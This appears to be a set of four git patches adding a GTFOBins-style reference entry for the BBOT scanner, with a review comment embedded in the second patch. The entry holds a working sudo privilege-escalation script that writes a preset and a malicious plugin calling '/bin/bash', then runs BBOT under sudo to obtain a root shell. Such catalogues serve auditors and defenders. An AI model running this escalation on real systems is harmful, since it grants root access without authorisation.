From 8ffd5cbbe5385933bc9642b48e3928e1ac8b842e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?=
Date: Mon, 24 Mar 2025 06:50:59 +0800
Subject: [PATCH 1/4] Updated at 2025/03/24
---
_gtfobins/bbot.md | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 _gtfobins/bbot.md
diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md
new file mode 100644
index 00000000..0e1c4aa6
--- /dev/null
+++ b/_gtfobins/bbot.md
@@ -0,0 +1,27 @@
+---
+functions:
+ sudo:
+ - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin.
+ code: |
+ TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
+ TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
+ TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
+ TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
+ PLUGIN_NAME=init_userbash
+ cat << EOF > $TEMP_YMLCONF
+ targets: localhost
+ output_dir: $TEMP_OUTDIR
+ module_dirs: $TEMP_PLUGINDIR
+ EOF
+ cat << EOF > $TEMP_PLUGIN
+ import os
+ from bbot.modules.base import BaseModule
+ class init_userbash(BaseModule):
+ async def setup(self):
+ self.hugeinfo(f"[*] Starting a new user shell ......")
+ os.system("/bin/bash")
+ async def handle_event(self, event):
+ self.hugeinfo(f"[*] Exiting shell ......")
+ EOF
+ sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost
+---
\ No newline at end of file
From 0da31e708c190cdd0742e08db0946200d520e2ba Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?=
Date: Mon, 24 Mar 2025 06:56:58 +0800
Subject: [PATCH 2/4] Update bbot.md Updated on 2025/03/24
---
_gtfobins/bbot.md | 48 +++++++++++++++++++++++------------------------
1 file changed, 24 insertions(+), 24 deletions(-)
diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md
index 0e1c4aa6..8d509a70 100644
--- a/_gtfobins/bbot.md
+++ b/_gtfobins/bbot.md
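Review bot: The `description` line of the new `_gtfobins/bbot.md` in [PATCH 1/4] never states the property that makes a sudo rule for `bbot` dangerous, and it speaks of "a couple of" config files and plugins where the `code` block writes exactly one of each. What the added lines show is that the preset given with `-p` points `module_dirs` at a directory the caller created, and `-m` then makes BBOT import a Python module from it, so that module's `setup()` runs with whatever privileges sudo grants. That is what someone auditing a sudoers entry needs to read, so I would reword it along the lines of `description: BBOT imports Python modules from the module_dirs named in a preset; when sudo permits bbot with caller-supplied -p and -m arguments, a module placed in a user-writable directory runs with the elevated privileges.` Patches 2/4 to 4/4 only re-indent these same lines, so the wording carries through unchanged.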
@@ -1,27 +1,27 @@ --- functions: sudo: - - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. - code: | - TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) - TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) - TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py - TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) - PLUGIN_NAME=init_userbash - cat << EOF > $TEMP_YMLCONF - targets: localhost - output_dir: $TEMP_OUTDIR - module_dirs: $TEMP_PLUGINDIR - EOF - cat << EOF > $TEMP_PLUGIN - import os - from bbot.modules.base import BaseModule - class init_userbash(BaseModule): - async def setup(self): - self.hugeinfo(f"[*] Starting a new user shell ......") - os.system("/bin/bash") - async def handle_event(self, event): - self.hugeinfo(f"[*] Exiting shell ......") - EOF - sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost ---- \ No newline at end of file + - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. + code: | + TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) + TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) + TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py + TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) + PLUGIN_NAME=init_userbash + cat << EOF > $TEMP_YMLCONF + targets: localhost + output_dir: $TEMP_OUTDIR + module_dirs: $TEMP_PLUGINDIR + EOF + cat << EOF > $TEMP_PLUGIN + import os + from bbot.modules.base import BaseModule + class init_userbash(BaseModule): + async def setup(self): + self.hugeinfo(f"[*] Starting a new user shell ......") + os.system("/bin/bash") + async def handle_event(self, event): + self.hugeinfo(f"[*] Exiting shell ......") + EOF + sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost +--- From 67d96a8d643b42193a3456becd6459336b0ce381 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?= Date: Mon, 24 Mar 2025 07:01:42 +0800 Subject: [PATCH 3/4] Update bbot.md Updated on 2025/03/24 --- _gtfobins/bbot.md | 38 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md index 8d509a70..0f5bdc1e 100644 --- a/_gtfobins/bbot.md +++ b/_gtfobins/bbot.md @@ -1,25 +1,25 @@ --- functions: sudo: - - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. - code: | - TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) - TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) - TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py - TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) - PLUGIN_NAME=init_userbash - cat << EOF > $TEMP_YMLCONF - targets: localhost - output_dir: $TEMP_OUTDIR - module_dirs: $TEMP_PLUGINDIR - EOF - cat << EOF > $TEMP_PLUGIN - import os - from bbot.modules.base import BaseModule - class init_userbash(BaseModule): - async def setup(self): - self.hugeinfo(f"[*] Starting a new user shell ......") - os.system("/bin/bash") + - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. + code: | + TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) + TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) + TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py + TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) + PLUGIN_NAME=init_userbash + cat << EOF > $TEMP_YMLCONF + targets: localhost + output_dir: $TEMP_OUTDIR + module_dirs: $TEMP_PLUGINDIR + EOF + cat << EOF > $TEMP_PLUGIN + import os + from bbot.modules.base import BaseModule + class init_userbash(BaseModule): + async def setup(self): + self.hugeinfo(f"[*] Starting a new user shell ......") + os.system("/bin/bash") async def handle_event(self, event): self.hugeinfo(f"[*] Exiting shell ......") EOF From bc54b7a2a042fa138a10ad3d67afa7f769f8d58f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?= Date: Mon, 24 Mar 2025 07:04:20 +0800 Subject: [PATCH 4/4] Update bbot.md Updated on 2025/03/24 --- _gtfobins/bbot.md | 44 ++++++++++++++++++++++---------------------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md index 0f5bdc1e..cc4b58fa 100644 --- a/_gtfobins/bbot.md +++ b/_gtfobins/bbot.md @@ -2,26 +2,26 @@ functions: sudo: - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. - code: | - TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) - TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) - TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py - TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) - PLUGIN_NAME=init_userbash - cat << EOF > $TEMP_YMLCONF - targets: localhost - output_dir: $TEMP_OUTDIR - module_dirs: $TEMP_PLUGINDIR - EOF - cat << EOF > $TEMP_PLUGIN - import os - from bbot.modules.base import BaseModule - class init_userbash(BaseModule): - async def setup(self): - self.hugeinfo(f"[*] Starting a new user shell ......") - os.system("/bin/bash") - async def handle_event(self, event): - self.hugeinfo(f"[*] Exiting shell ......") - EOF - sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost + code: | + TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) + TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) + TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py + TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) + PLUGIN_NAME=init_userbash + cat << EOF > $TEMP_YMLCONF + targets: localhost + output_dir: $TEMP_OUTDIR + module_dirs: $TEMP_PLUGINDIR + EOF + cat << EOF > $TEMP_PLUGIN + import os + from bbot.modules.base import BaseModule + class init_userbash(BaseModule): + async def setup(self): + self.hugeinfo(f"[*] Starting a new user shell ......") + os.system("/bin/bash") + async def handle_event(self, event): + self.hugeinfo(f"[*] Exiting shell ......") + EOF + sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost ---